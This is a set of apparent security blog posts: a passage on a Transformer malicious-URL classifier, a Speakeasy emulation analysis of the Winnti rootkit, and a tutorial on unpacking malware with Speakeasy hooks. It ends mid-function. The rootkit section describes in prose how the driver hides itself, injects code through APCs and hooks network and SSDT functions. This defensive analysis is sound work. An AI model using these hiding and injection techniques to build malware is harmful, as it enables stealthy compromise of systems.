With the model architecture in hand, we now turn to the question of how to train the model to most effectively detect malicious URLs. Of course, we can train this model in a similar way to other supervised deep learning classifiers by: (1) making predictions on samples from a labeled training set, (2) using a loss function to measure the quality of our predictions, and (3) tuning model parameters (i.e., weights) via backpropagation. However, the nature of the Transformer model allows for several interesting variations on this training regime. In fact, one of the reasons that Transformers have become so popular for NLP tasks is that they allow for self-supervised generative pre-training, which takes advantage of massive amounts of unlabeled data to help the model learn general characteristics of the input language before being fine-tuned on the ultimate task at hand (e.g., question answering, sentiment analysis, etc.). Here, we outline some of the training regimes we explored for our URL Transformer model.

Direct Label Prediction (Decode-To-Label)

Using a training set of URLs with malicious and benign labels, we can treat the URL Transformer architecture as a feature extractor, whose outputs we use as the input to a traditional classifier (e.g., FFNN or even a random forest). When using a FFNN as our classifier, we can backpropagate the classification loss (e.g., binary cross-entropy) through both the classifier and the Transformer network to adjust the weights to perform classification. This training regime is the baseline for our experiments and is how most deep learning models are trained for classification tasks.

Next-Character Prediction Pre-Training and Fine-Tuning

Beyond the baseline classification training regime, the NLP literature suggests that one can learn a self-supervised embedding of the input sequence by training the Transformer to perform a next-character prediction task, then fine-tuning the learned representation for the classification problem. A key advantage of this approach is that data used for pre-training does not require malicious or benign labels; instead, the next characters in a URL serve as the labels to be predicted from prior characters in the sequence. This is similar to the example given in Figure 1, where the embedding output is used to predict the next character, “y,” in “fireeye.com.” Overall, this training regime allows us to take advantage of the massive amount of unlabeled data that is typically available in cyber security-related problems.

The overall structure of the architecture for this regime is similar to the aforementioned binary classification task, with FFNN layers added for classification. However, since we are now predicting multiple classes (i.e., one class per input character in the vocabulary), we must apply a softmax function to the output to induce a probability distribution over the potential output characters. Once the Transformer portion of the network is pre-trained in this way, we can swap the FFNN classification layers focused on character prediction with new layers that will be trained for the malicious URL classification problem, as in the decode-to-label case.
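
In code, the self-supervised objective is just a one-character shift between inputs and targets. Continuing the hedged sketch shown after Figure 1:

import torch
import torch.nn.functional as F

PAD = 0                                     # as in the sketch above
model = URLTransformer()                    # from the sketch after Figure 1
ids = torch.randint(2, 128, (32, 64))       # stand-in batch of character ids

inputs, targets = ids[:, :-1], ids[:, 1:]   # next-character labels; no malicious/benign labels needed
logits, _ = model(inputs)                   # (batch, seq-1, vocab)
# cross_entropy applies the softmax over the character vocabulary
loss = F.cross_entropy(logits.transpose(1, 2), targets, ignore_index=PAD)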

Balanced Mixed-Objective Training

Prior work has shown that imbuing the training process with additional knowledge outside of the primary task can help constrain the learning process, and ultimately result in better models. For instance, a malware classifier might train using loss functions that capture malicious/benign classification, malware family prediction, and tag prediction tasks as a mechanism to provide the classifier with broader understanding of the problem than looking at malicious/benign labels in isolation.

Inspired by these findings, we also introduced a mixed-objective training regime for our URL Transformer, where we train for binary classification and next-character prediction simultaneously. At each iteration of training, we compute a loss multiplier for each term so that each term's contribution to the net loss is fixed prior to backpropagation. This ensures that neither loss term dominates during training. Specifically, for minibatch i, the net loss L_Mixed is computed as:

L_Mixed = α_i · L_CLS + β_i · L_Next

Given hyperparameters a and b, defined such that a + b := 1, we compute the constants α_i and β_i so that the net loss contribution of L_CLS to L_Mixed is a and the net contribution of L_Next to L_Mixed is b. For our evaluations, we set a := b := 0.5, effectively requiring that the model equally balance its ability to generate the next character and accurately predict malicious URLs.
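
One way to realize this balancing in PyTorch is to scale each term by a multiplier computed from its detached magnitude, as in the following sketch; this is a minimal interpretation of the scheme described above, not our exact implementation.

import torch.nn.functional as F

def mixed_loss(cls_logits, labels, next_logits, next_targets, a=0.5, b=0.5):
    l_cls = F.binary_cross_entropy_with_logits(cls_logits.squeeze(-1), labels)
    l_next = F.cross_entropy(next_logits.transpose(1, 2), next_targets)
    # Multipliers use detached values, so each term's contribution to the
    # mixed loss is fixed at a and b before backpropagation.
    w_cls = a / l_cls.detach().clamp_min(1e-8)
    w_next = b / l_next.detach().clamp_min(1e-8)
    return w_cls * l_cls + w_next * l_next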

Evaluation

To evaluate our URL Transformer model and better understand the impact of the three training regimes discussed earlier, we collected a training dataset of over 1M labeled malicious and benign URLs, which was split into roughly 700K training samples, 100K validation samples, and 200K test samples. We also developed an unlabeled pre-training dataset of 20M URLs.

Using this data, we performed four different training runs for our Transformer model:

  1. DecodeToLabel (Baseline): Using strictly the binary cross-entropy loss on the embedded classification features over the entire sequence, we trained the model for 15 epochs using the training set.
  2. MixedObjective: We trained the model for 15 epochs on the training set, using both the embedded classification features and the embedded next-character prediction features.
  3. FineTune: We pre-trained the model for 15 epochs on the next-character prediction task using the training set, ignoring the malicious/benign labels. We then froze weights over the first 16 layers of the model and trained the model for an additional 15 epochs using a binary cross-entropy loss on the classification labels.
  4. FineTune 20M: We performed pre-training on the next-character prediction task using the 20M URL dataset, pre-training for 2 epochs. We then froze weights over the first 16 layers of the Transformer and trained for 15 epochs on the binary classification task.
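
Freezing the pre-trained portion of the network for regimes 3 and 4 is straightforward in most frameworks. A hedged PyTorch sketch follows; the layer indices depend on the actual model depth (our illustrative sketch above used fewer layers than the 16 frozen here).

# Freeze the pre-trained Transformer layers, leaving only the later layers
# and the classification head trainable during fine-tuning.
for layer in model.encoder.layers[:16]:
    for param in layer.parameters():
        param.requires_grad = False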

The ROC curve shown in Figure 2 compares the performance of these four training regimes. Here, our baseline DecodeToLabel model (red) yielded a ROC curve with 0.9484 AUC, while the MixedObjective model (green) slightly outperformed the baseline with an AUC of 0.956. Interestingly, both fine-tuning models yielded poor classification results, which runs counter to established practice with these Transformer models in the NLP domain.


Figure 2: ROC curves for four URL Transformer training regimes

To assess the relative efficacy of our Transformer models on this dataset, we also fit several other types of benchmark models developed for URL classification: (1) a Random Forest model on SME-derived features, (2) a 1D Convolutional Neural Network (CNN) model on character embeddings, and (3) a Long Short-Term Memory (LSTM) neural network on character embeddings. Details of these models can be found in our white paper; however, we find that our top-performing Transformer model performs on par with the best-performing non-Transformer baseline (a 1D CNN model), which perhaps indicates that the long-range dependencies typically learned by Transformer models are not as useful for malicious URL detection.


Figure 3: ROC curves comparing URL Transformer to other benchmark URL classification models

Summary

Our experiments suggest that Transformers can achieve performance comparable to or better than that of other top-performing models for URL classification, though the details of how to achieve that performance differ from common practice. Contrary to findings from the NLP domain, wherein self-supervised pre-training substantially enhances performance on a fine-tuned classification task, similar pre-training approaches actually diminished performance for malicious URL detection. This suggests that the next-character prediction task correlates too weakly with malicious/benign prediction for effective, stable transfer.

Interestingly, utilizing next-character prediction as an auxiliary loss function in conjunction with a malicious/benign loss yields improvements over training solely to predict the label. We hypothesize that while pre-training leads to a relatively poor generative model due to randomized content in the URLs within our dataset, a malicious/benign loss may serve to better condition the generative model learned by the next-character prediction task, distilling a subset of relevant information. It may also be the case that the long-distance relationships that are key to the generative pre-training task are not as important for the final malicious URL classification, as evidenced by the performance of the 1D CNN model.

Note that we did not perform a rigorous hyperparameter search for our Transformer, since this research was primarily concerned with loss functions and training regimes. Therefore, it is still an open question as to whether a more optimal architecture, specifically designed for this classification task, could substantially outperform the models described here.

While our URL dataset is not representative of all data in the cyber security space, the difficulty of obtaining a readily fine-tuned model from self-supervised pre-training suggests that this approach is unlikely to work well for training Transformers on longer sequences or on sequences that bear less resemblance to natural language (e.g., PE files), although an auxiliary loss might still work.

Details about this research and additional results can be found in our associated white paper.

Emulation of Kernel Mode Rootkits With Speakeasy

20 January 2021 at 16:45

In August 2020, we released a blog post about how the Speakeasy emulation framework can be used to emulate user mode malware such as shellcode. If you haven’t had a chance, give the post a read today.

In addition to user mode emulation, Speakeasy also supports emulation of kernel mode Windows binaries. When malware authors employ kernel mode malware, it will often be in the form of a device driver whose end goal is total compromise of an infected system. The malware most often doesn’t interact with hardware and instead leverages kernel mode to fully compromise the system and remain hidden.

Challenges With Dynamically Analyzing Kernel Malware

Ideally, a kernel mode sample can be reversed statically using tools such as disassemblers. However, binary packers obfuscate kernel malware just as easily as they do user mode samples. Additionally, static analysis is often expensive and time consuming. If our goal is to automatically analyze many variants of the same malware family, it makes sense to dynamically analyze malicious driver samples.

Dynamic analysis of kernel mode malware can be more involved than with user mode samples. In order to debug kernel malware, a proper environment needs to be created. This usually involves setting up two separate virtual machines as debugger and debuggee. The malware can then be loaded as an on-demand kernel service where the driver can be debugged remotely with a tool such as WinDbg.

Several sandbox-style applications exist that use hooking or other monitoring techniques, but they typically target user mode applications. Having similar sandbox monitoring work for kernel mode code would require deep, system-level hooks that would likely produce significant noise.

Driver Emulation

Emulation has proven to be an effective analysis technique for malicious drivers. No custom setup is required, and drivers can be emulated at scale. In addition, maximum code coverage is easier to achieve than in a sandbox environment. Often, rootkits may expose malicious functionality via I/O request packet (IRP) handlers (or other callbacks). On a normal Windows system these routines are executed when other applications or devices send input/output requests to the driver. This includes common tasks such as reading, writing, or sending device I/O control (IOCTLs) to a driver to execute some type of functionality.

Using emulation, these entry points can be called directly with doped IRP packets in order to identify as much functionality as possible in the rootkit. As we discussed in the first Speakeasy blog post, additional entry points are emulated as they are discovered. A driver’s DriverEntry function is responsible for initializing a function dispatch table that is called to handle I/O requests. Speakeasy will attempt to emulate each of these functions after the main entry point has completed by supplying a dummy IRP. Additionally, any system threads or work items that are created are sequentially emulated in order to get as much code coverage as possible.

Emulating a Kernel Mode Implant

In this blog post, we will show an example of Speakeasy’s effectiveness at emulating a real kernel mode implant family publicly named Winnti. This sample was chosen despite its age because it transparently implements some classic rootkit functionality. The goal of this post is not to discuss the analysis of the malware itself as it is fairly antiquated. Rather, we will focus on the events that are captured during emulation.

The Winnti sample we will be analyzing has SHA256 hash c465238c9da9c5ea5994fe9faf1b5835767210132db0ce9a79cb1195851a36fb and the original file name tcprelay.sys. For most of this post, we will be examining the emulation report generated by Speakeasy. Note: many techniques employed by this 32-bit rootkit will not work on modern 64-bit versions of Windows due to Kernel Patch Protection (PatchGuard) which protects against modification of critical kernel data structures.

To start, we will instruct Speakeasy to emulate the kernel driver using the command line shown in Figure 1. We instruct Speakeasy to create a full memory dump (using the “-d” flag) so we can acquire memory later. We supply the memory tracing flag (“-m”) which will log all memory reads and writes performed by the malware. This is useful for detecting things like hooking and direct kernel object manipulation (DKOM).


Figure 1: Command line used to emulate the malicious driver
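
The same run can also be driven from Python. Based on Speakeasy's documented scripting interface, a minimal sketch looks like the following; the report and dump handling shown here is hedged, and the next blog post in this collection covers the programmatic API in depth.

import speakeasy

# Minimal programmatic equivalent of the command line run
se = speakeasy.Speakeasy()
module = se.load_module('tcprelay.sys')  # driver emulator selected from PE headers
se.run_module(module)
report = se.get_json_report()            # the JSON events referenced throughout this post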

Speakeasy will then begin emulating the malware’s DriverEntry function. The entry point of a driver is responsible for setting up passive callback routines that will service user mode I/O requests as well as callbacks used for device addition, removal, and unloading. Reviewing the emulation report for the malware’s DriverEntry function (identified in the JSON report with an “ep_type” of “entry_point”), shows that the malware finds the base address of the Windows kernel. The malware does this by using the ZwQuerySystemInformation API to locate the base address for all kernel modules and then looking for one named “ntoskrnl.exe”. The malware then manually finds the address of the PsCreateSystemThread API. This is then used to spin up a system thread to perform its actual functionality. Figure 2 shows the APIs called from the malware's entry point.


Figure 2: Key functionality in the tcprelay.sys entry point

Hiding the Driver Object

The malware attempts to hide itself before executing its main system thread. The malware first looks up the “DriverSection” field in its own DRIVER_OBJECT structure. This field holds a linked list containing all loaded kernel modules and the malware attempts to unlink itself to hide from APIs that list loaded drivers. In the “mem_access” field in the Speakeasy report shown in Figure 3, we can see two memory writes to the DriverSection entries before and after itself which will remove itself from the linked list.


Figure 3: Memory write events representing the tcprelay.sys malware attempting to unlink itself in order to hide

As noted in the original Speakeasy blog post, when threads or other dynamic entry points are created at runtime, the framework will follow them for emulation. In this case, the malware created a system thread and Speakeasy automatically emulated it.

Moving on to the newly created thread (identified by an “ep_type” of “system_thread”), we can see the malware begin its real functionality. The malware begins by enumerating all running processes on the host, looking for the service controller process named services.exe. It's important to note that the process listing that gets returned to the emulated samples is configurable via JSON config files supplied at runtime. For more information on these configuration options please see the Speakeasy README on our GitHub repository. An example of this configurable process listing is shown in Figure 4.


Figure 4: Process listing configuration field supplied to Speakeasy

Pivoting to User Mode

Once the malware locates the services.exe process, it will attach to its process context and begin inspecting user mode memory in order to locate the addresses of exported user mode functions. The malware does this so it can later inject an encoded, memory-resident DLL into the services.exe process. Figure 5 shows the APIs used by the rootkit to resolve its user mode exports.


Figure 5: Logged APIs used by tcprelay.sys rootkit to resolve exports for its user mode implant

Once the exported functions are resolved, the rootkit is ready to inject the user mode DLL component. Next, the malware manually copies the in-memory DLL into the services.exe process address space. These memory write events are captured and shown in Figure 6.


Figure 6: Memory write events captured while copying the user mode implant into services.exe

A common technique that rootkits use to execute user mode code involves a Windows feature known as Asynchronous Procedure Calls (APC). APCs are functions that execute asynchronously within the context of a supplied thread. Using APCs allows kernel mode applications to queue code to run within a thread’s user mode context. Malware often wants to inject into user mode since much of the common functionality (such as network communication) within Windows can be more easily accessed. In addition, running in user mode lowers the risk of detection should faulty code bug-check the entire machine.

In order to queue an APC to fire in user mode, the malware must locate a thread in an “alertable” state. Threads are said to be alertable when they relinquish their execution quantum to the kernel thread scheduler and notify the kernel that they are able to dispatch APCs. The malware searches for threads within the services.exe process and once it detects one that’s alertable it will allocate memory for the DLL to inject then queue an APC to execute it.

Speakeasy emulates all kernel structures involved in this process, specifically the executive thread object (ETHREAD) structures that are allocated for every thread on a Windows system. Malware may attempt to grovel through this opaque structure to identify when a thread’s alertable flag is set (and therefore a valid candidate for an APC). Figure 7 shows the memory read event that was logged when the Winnti malware manually parsed an ETHREAD structure in the services.exe process to confirm it was alertable. At the time of this writing, all threads within the emulator present themselves as alertable by default.


Figure 7: Event logged when the tcprelay.sys malware confirmed a thread was alertable

Next, the malware can execute any user mode code it wants using this thread object. The undocumented functions KeInitializeApc and KeInsertQueueApc will initialize and execute a user mode APC respectively. Figure 8 shows the API set that the malware uses to inject a user mode module into the services.exe process. The malware executes a shellcode stub as the target of the APC that will then execute a loader for the injected DLL. All of this can be recovered from the memory dump package and analyzed later.


Figure 8: Logged APIs used by tcprelay.sys rootkit to inject into user mode via an APC

Network Hooks

After injecting into user mode, the kernel component will attempt to install network obfuscation hooks (presumably to hide the user mode implant). Speakeasy tracks and tags all memory within the emulation space. In the context of kernel mode emulation, this includes all kernel objects (e.g. Driver and Device objects, and the kernel modules themselves). Immediately after we observe the malware inject its user mode implant, we see it begin to attempt to hook kernel components. This was confirmed during static analysis to be used for network hiding.

The memory access section of the emulation report reveals that the malware modified the netio.sys driver, specifically code within the exported function named NsiEnumerateObjectsAllParametersEx. This function is ultimately called when a user on the system runs the “netstat” command and it is likely that the malware is hooking this function in order to hide connected network ports on the infected system. This inline hook was identified by the event captured in Figure 9.


Figure 9: Inline function hook set by the malware to hide network connections

In addition, the malware hooks the Tcpip driver object in order to accomplish additional network hiding. Specifically, the malware hooks the IRP_MJ_DEVICE_CONTROL handler for the Tcpip driver. User mode code may send IOCTL codes to this function when querying for active connections. This type of hook can be easily identified with Speakeasy by looking for memory writes to critical kernel objects as shown in Figure 10.


Figure 10: Memory write event used to hook the Tcpip network driver

System Service Dispatch Table Hooks

Finally, the rootkit will attempt to hide itself using the nearly ancient technique of system service dispatch table (SSDT) patching. Speakeasy allocates a fake SSDT so malware can interact with it. The SSDT is a function table that exposes kernel functionality to user mode code. The event in Figure 11 shows that the SSDT structure was modified at runtime.


Figure 11: SSDT hook detected by Speakeasy

If we look at the malware in IDA Pro, we can confirm that it patches the SSDT entries for the ZwQueryDirectoryFile and ZwEnumerateKey APIs, which it uses to hide itself from file system and registry analysis. The SSDT patch function is shown in Figure 12.


Figure 12: File hiding SSDT patching function shown in IDA Pro

After setting up these hooks, the system thread will exit. The other entry points (such as the IRP handlers and DriverUnload routines) in the driver are less interesting and contain mostly boilerplate driver code.

Acquiring the Injected User Mode Implant

Now that we have a good idea what the driver does to hide itself on the system, we can use the memory dumps created by Speakeasy to acquire the injected DLL discussed earlier. Opening the zip file we created at emulation time, we can find the memory tag referenced in Figure 6. We quickly confirm the memory block has a valid PE header and it successfully loads into IDA Pro as shown in Figure 13.


Figure 13: Injected user mode DLL recovered from Speakeasy memory dump

Conclusion

In this blog post, we discussed how Speakeasy can be effective at automatically identifying rootkit activity from the kernel mode binary. Speakeasy can be used to quickly triage kernel binaries that may otherwise be difficult to dynamically analyze. For more information and to check out the code, head over to our GitHub repository.

Using Speakeasy Emulation Framework Programmatically to Unpack Malware

1 December 2020 at 20:30

Andrew Davis recently announced the public release of his new Windows emulation framework named Speakeasy. While the introductory blog post focused on using Speakeasy as an automated malware sandbox of sorts, this entry will highlight another powerful use of the framework: automated malware unpacking. I will demonstrate, with code examples, how Speakeasy can be used programmatically to:

  • Bypass unsupported Windows APIs to continue emulation and unpacking
  • Save virtual addresses of dynamically allocated code using API hooks
  • Surgically direct execution to key areas of code using code hooks
  • Dump an unpacked PE from emulator memory and fix its section headers
  • Aid in reconstruction of import tables by querying Speakeasy for symbolic information

Initial Setup

One approach to interfacing with Speakeasy is to create a subclass of Speakeasy’s Speakeasy class. Figure 1 shows a Python code snippet that sets up such a class that will be expanded in upcoming examples.

import speakeasy

class MyUnpacker(speakeasy.Speakeasy):
    def __init__(self, config=None):
        super(MyUnpacker, self).__init__(config=config)

Figure 1: Creating a Speakeasy subclass

The code in Figure 1 accepts a Speakeasy configuration dictionary that may be used to override the default configuration. Speakeasy ships with several configuration files. The Speakeasy class is a wrapper for an underlying emulator class; the emulator class is chosen automatically when a binary is loaded, based on its PE headers or on whether it is specified as shellcode. Subclassing Speakeasy makes it easy to access, extend, or modify interfaces. It also facilitates reading and writing stateful data before, during, and after emulation.

Emulating a Binary

Figure 2 shows how to load a binary into the Speakeasy emulator.

self.module = self.load_module(filename)

Figure 2: Loading the binary into the emulator

The load_module function returns a PeFile object for the provided binary on disk. It is an instance of the PeFile class defined in speakeasy/windows/common.py, which is subclassed from pefile’s PE class. Alternatively, you can provide the bytes of a binary using the data parameter rather than specifying a file name. Figure 3 shows how to emulate a loaded binary.

self.run_module(self.module)

Figure 3: Starting emulation

API Hooks

The Speakeasy framework ships with support for hundreds of Windows APIs with more being added frequently. This is accomplished via Python API handlers defined in appropriate files in the speakeasy/winenv/api directory. API hooks can be installed to have your own code executed when particular APIs are called during emulation. They can be installed for any API, regardless of whether a handler exists or not. An API hook can be used to override an existing handler and that handler can optionally be invoked from your hook. The API hooking mechanism in Speakeasy provides flexibility and control over emulation. Let’s examine a few uses of API hooking within the context of emulating unpacking code to retrieve an unpacked payload.

Bypassing Unsupported APIs

When Speakeasy encounters an unsupported Windows API call, it stops emulation and provides the name of the API function that is not supported. If the API function in question is not critical for unpacking the binary, you can add an API hook that simply returns a value that allows execution to continue. For example, a recent sample’s unpacking code contained API calls that had no effect on the unpacking process. One such API call was to GetSysColor. In order to bypass this call and allow execution to continue, an API hook may be added as shown in Figure 4.

self.add_api_hook(self.getsyscolor_hook,
                  'user32',
                  'GetSysColor',
                  argc=1
                  )

Figure 4: Adding an API hook

According to MSDN, this function takes 1 parameter and returns an RGB color value represented as a DWORD. If the calling convention for the API function you are hooking is not stdcall, you can specify the calling convention in the optional call_conv parameter. The calling convention constants are defined in the speakeasy/common/arch.py file. Because the GetSysColor return value does not impact the unpacking process, we can simply return 0. Figure 5 shows the definition of the getsyscolor_hook function specified in Figure 4.

def getsyscolor_hook(self, emu, api_name, func, params):
    return 0

Figure 5: The GetSysColor hook returns 0

If an API function requires more finessed handling, you can implement a more specific and meaningful hook that suits your needs. If your hook implementation is robust enough, you might consider contributing it to the Speakeasy project as an API handler!  

Adding an API Handler

Within the speakeasy/winenv/api directory you'll find usermode and kernelmode subdirectories that contain Python files for corresponding binary modules. These files contain the API handlers for each module. In usermode/kernel32.py, we see a handler defined for SetEnvironmentVariable as shown in Figure 6.

1: @apihook('SetEnvironmentVariable', argc=2)
2: def SetEnvironmentVariable(self, emu, argv, ctx={}):
3:     '''
4:     BOOL SetEnvironmentVariable(
5:         LPCTSTR lpName,
6:         LPCTSTR lpValue
7:         );
8:     '''
9:     lpName, lpValue = argv
10:    cw = self.get_char_width(ctx)
11:    if lpName and lpValue:
12:        name = self.read_mem_string(lpName, cw)
13:        val = self.read_mem_string(lpValue, cw)
14:        argv[0] = name
15:        argv[1] = val
16:        emu.set_env(name, val)
17:    return True

Figure 6: API handler for SetEnvironmentVariable

A handler begins with a function decorator (line 1) that defines the name of the API and the number of parameters it accepts. At the start of a handler, it is good practice to include MSDN's documented prototype as a comment (lines 3-8).

The handler's code begins by storing elements of the argv parameter in variables named after their corresponding API parameters (line 9). The handler's ctx parameter is a dictionary that contains contextual information about the API call. For API functions that end in an ‘A’ or ‘W’ (e.g., CreateFileA), the character width can be retrieved by passing the ctx parameter to the get_char_width function (line 10). This width value can then be passed to calls such as read_mem_string (lines 12 and 13), which reads the emulator’s memory at a given address and returns a string.

It is good practice to overwrite string pointer values in the argv parameter with their corresponding string values (lines 14 and 15). This enables Speakeasy to display string values instead of pointer values in its API logs. To illustrate the impact of updating argv values, examine the Speakeasy output shown in Figure 7. In the VirtualAlloc entry, the symbolic constant string PAGE_EXECUTE_READWRITE replaces the value 0x40. In the GetModuleFileNameA and CreateFileA entries, pointer values are replaced with a file path.

KERNEL32.VirtualAlloc(0x0, 0x2b400, 0x3000, "PAGE_EXECUTE_READWRITE") -> 0x7c000
KERNEL32.GetModuleFileNameA(0x0, "C:\\Windows\\system32\\sample.exe", 0x104) -> 0x58
KERNEL32.CreateFileA("C:\\Windows\\system32\\sample.exe", "GENERIC_READ", 0x1, 0x0, "OPEN_EXISTING", 0x80, 0x0) -> 0x84

Figure 7: Speakeasy API logs

Saving the Unpacked Code Address

Packed samples often use functions such as VirtualAlloc to allocate memory used to store the unpacked sample. An effective approach for capturing the location and size of the unpacked code is to first hook the memory allocation function used by the unpacking stub. Figure 8 shows an example of hooking VirtualAlloc to capture the virtual address and amount of memory being allocated by the API call.

1: def virtualalloc_hook(self, emu, api_name, func, params):
2:     '''
3:     LPVOID VirtualAlloc(
4:        LPVOID lpAddress,
5:        SIZE_T dwSize,
6:        DWORD  flAllocationType,
7:        DWORD  flProtect
8:      );
9:     '''
10:    PAGE_EXECUTE_READWRITE = 0x40
11:    lpAddress, dwSize, flAllocationType, flProtect = params
12:    rv = func(params)
13:    if lpAddress == 0 and flProtect == PAGE_EXECUTE_READWRITE:
14:        self.logger.debug("[*] unpack stub VirtualAlloc call, saving dump info")
15:        self.dump_addr = rv
16:        self.dump_size = dwSize

17:    return rv

Figure 8: VirtualAlloc hook to save memory dump information

The hook in Figure 8 calls Speakeasy’s API handler for VirtualAlloc on line 12 to allow memory to be allocated. The virtual address returned by the API handler is saved to a variable named rv. Since VirtualAlloc may be used to allocate memory not related to the unpacking process, additional checks are used on line 13 to confirm the intercepted VirtualAlloc call is the one used in the unpacking code. Based on prior analysis, we’re looking for a VirtualAlloc call that receives the lpAddress value 0 and the flProtect value PAGE_EXECUTE_READWRITE (0x40). If these arguments are present, the virtual address and specified size are stored on lines 15 and 16 so they may be used to extract the unpacked payload from memory after the unpacking code is finished. Finally, on line 17, the return value from the VirtualAlloc handler is returned by the hook.

Surgical Code Emulation Using API and Code Hooks

Speakeasy is a robust emulation framework; however, you may encounter binaries that have large sections of problematic code. For example, a sample may call many unsupported APIs or simply take far too long to emulate. An example of overcoming both challenges is described in the following scenario.

Unpacking Stubs Hiding in MFC Projects

A popular technique used to disguise malicious payloads involves hiding them inside a large, open-source MFC project. MFC is short for Microsoft Foundation Class, which is a popular library used to build Windows desktop applications. These MFC projects are often arbitrarily chosen from popular Web sites such as Code Project. While the MFC library makes it easy to create desktop applications, MFC applications are difficult to reverse engineer due to their size and complexity. They are particularly difficult to emulate due to their large initialization routine that calls many different Windows APIs. What follows is a description of my experience with writing a Python script using Speakeasy to automate unpacking of a custom packer that hides its unpacking stub within an MFC project.

Reverse engineering the packer revealed the unpacking stub is ultimately called during initialization of the CWinApp object, which occurs after initialization of the C runtime and MFC. After attempting to bypass unsupported APIs, I realized that, even if successful, emulation would take far too long to be practical. I considered skipping over the initialization code completely and jumping straight to the unpacking stub. Unfortunately, execution of the C-runtime initialization code was required in order for emulation of the unpacking stub to succeed.

My solution was to identify a location in the code that fell after the C-runtime initialization but was early in the MFC initialization routine. After examining the Speakeasy API log shown in Figure 9, such a location was easy to spot. The graphics-related API function GetDeviceCaps is invoked early in the MFC initialization routine. This was deduced based on 1) MFC is a graphics-dependent framework and 2) GetDeviceCaps is unlikely to be called during C-runtime initialization.

0x43e0a7: 'kernel32.FlsGetValue(0x0)' -> 0x4150
0x43e0e3: 'kernel32.DecodePointer(0x7049)' -> 0x7048
0x43b16a: 'KERNEL32.HeapSize(0x4130, 0x0, 0x7000)' -> 0x90
0x43e013: 'KERNEL32.TlsGetValue(0x0)' -> 0xfeee0001
0x43e02a: 'KERNEL32.TlsGetValue(0x0)' -> 0xfeee0001
0x43e02c: 'kernel32.FlsGetValue(0x0)' -> 0x4150
0x43e068: 'kernel32.EncodePointer(0x44e215)' -> 0x44e216
0x43e013: 'KERNEL32.TlsGetValue(0x0)' -> 0xfeee0001
0x43e02a: 'KERNEL32.TlsGetValue(0x0)' -> 0xfeee0001
0x43e02c: 'kernel32.FlsGetValue(0x0)' -> 0x4150
0x43e068: 'kernel32.EncodePointer(0x704c)' -> 0x704d
0x43c260: 'KERNEL32.LeaveCriticalSection(0x466f28)' -> None
0x422151: 'USER32.GetSystemMetrics(0xb)' -> 0x1
0x422158: 'USER32.GetSystemMetrics(0xc)' -> 0x1
0x42215f: 'USER32.GetSystemMetrics(0x2)' -> 0x1
0x422169: 'USER32.GetSystemMetrics(0x3)' -> 0x1
0x422184: 'GDI32.GetDeviceCaps(0x288, 0x58)' -> None

Figure 9: Identifying beginning of MFC code in Speakeasy API logs

To intercept execution at this stage I created an API hook for GetDeviceCaps as shown in Figure 10. The hook confirms the function is being called for the first time on line 2.

1: def mfc_init_hook(self, emu, api_name, func, params):
2:     if not self.trigger_hit:
3:         self.trigger_hit = True
4:         self.h_code_hook = self.add_code_hook(self.start_unpack_func_hook)
5:         self.logger.debug("[*] MFC init api hit, starting unpack function")

Figure 10: API hook set for GetDeviceCaps

Line 4 shows the creation of a code hook using the add_code_hook function of the Speakeasy class. Code hooks allow you to specify a callback function that is called before each instruction that is emulated. Speakeasy also allows you to optionally specify an address range for which the code hook will be effective by specifying begin and end parameters.

After the code hook is added on line 4, the GetDeviceCaps hook completes and, prior to the execution of the sample's next instruction, the start_unpack_func_hook function is called. This function is shown in Figure 11.

1: def start_unpack_func_hook(self, emu, addr, size, ctx):
2:     self.h_code_hook.disable()
3:     unpack_func_va = self.module.get_rva_from_offset(self.unpack_offs) + self.module.get_base()
4:     self.set_pc(unpack_func_va)

Figure 11: Code hook that changes the instruction pointer

The code hook receives the emulator object, the address and size of the current instruction, and the context dictionary (line 1). On line 2, the code hook disables itself. Because code hooks are executed with each instruction, this slows emulation significantly. Therefore, they should be used sparingly and disabled as soon as possible. On line 3, the hook calculates the virtual address of the unpacking function. The offset used to perform this calculation was located using a regular expression. This part of the example was omitted for the sake of brevity.

The self.module attribute was previously set in the example code shown in Figure 2. Because it is subclassed from pefile's PE class, we can access useful functions such as get_rva_from_offset() on line 3. This line also includes an example of using self.module.get_base() to retrieve the module's base virtual address.

Finally, on line 4, the instruction pointer is changed using the set_pc function and emulation continues at the unpacking code. The code snippets in Figure 10 and Figure 11 allowed us to redirect execution to the unpacking code after the C-runtime initialization completed and avoid MFC initialization code.

Dumping and Fixing Unpacked PEs

Once emulation has reached the original entry point of the unpacked sample, it is time to dump the PE and fix it up. Typically, a hook would save the base address of the unpacked PE in an attribute of the class as illustrated on line 15 of Figure 8. If the unpacked PE does not contain the correct entry point in its PE headers, the true entry point may also need to be captured during emulation. Figure 12 shows an example of how to dump emulator memory to a file.

with open(self.output_path, "wb") as up:
    mm = self.get_address_map(self.dump_addr)
    up.write(self.mem_read(mm.get_base(), mm.get_size()))

Figure 12: Dumping the unpacked PE

If you are dumping a PE that has already been loaded in memory, it will not have the same layout as it does on disk due to differences in section alignment. As a result, the dumped PE's headers may need to be modified. One approach is to modify each section's PointerToRawData value to match its VirtualAddress field. Each section's SizeOfRawData value may need to be padded in order to conform with the FileAlignment value specified in the PE's optional header. Keep in mind the resulting PE is unlikely to execute successfully. However, these efforts will allow most static analysis tools to function correctly.
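
As a sketch of those fix-ups using the pefile library (sufficient for many dumps, though robust unpackers handle more corner cases):

import pefile

def fix_section_headers(dump_path, out_path):
    pe = pefile.PE(dump_path)
    align = pe.OPTIONAL_HEADER.FileAlignment
    for section in pe.sections:
        # In a memory dump, raw offsets should mirror virtual addresses
        section.PointerToRawData = section.VirtualAddress
        # Pad the raw size up to the file alignment
        vsize = section.Misc_VirtualSize
        section.SizeOfRawData = (vsize + align - 1) // align * align
    pe.write(filename=out_path)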

The final step for repairing the dumped PE is to fix its import table. This is a complex task deserving of its own blog post and will not be discussed in detail here. However, the first step involves collecting a list of library function names and their addresses in emulator memory. If you know the GetProcAddress API is used by the unpacker stub to resolve imports for the unpacked PE, you can call the get_dyn_imports function as shown in Figure 13.

api_addresses = self.get_dyn_imports()

Figure 13: Retrieving dynamic imports

Otherwise, you can query the emulator class to retrieve its symbol information by calling the get_symbols function as shown in Figure 14.

symbols = self.get_symbols()

Figure 14: Retrieve symbol information from emulator class

This data can be used to discover the IAT of the unpacked PE and fix or reconstruct its import related tables.
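
For example, assuming the symbol data maps emulated addresses to API names, a simple scan of the dump for pointer-sized values that land on known APIs can locate IAT candidates. The sketch below assumes a 32-bit image; the exact structure returned by get_symbols is hedged.

import struct

def find_iat_candidates(mem_bytes, image_base, symbols):
    # symbols: {emulated_address: 'module.FunctionName'} (assumed layout)
    hits = {}
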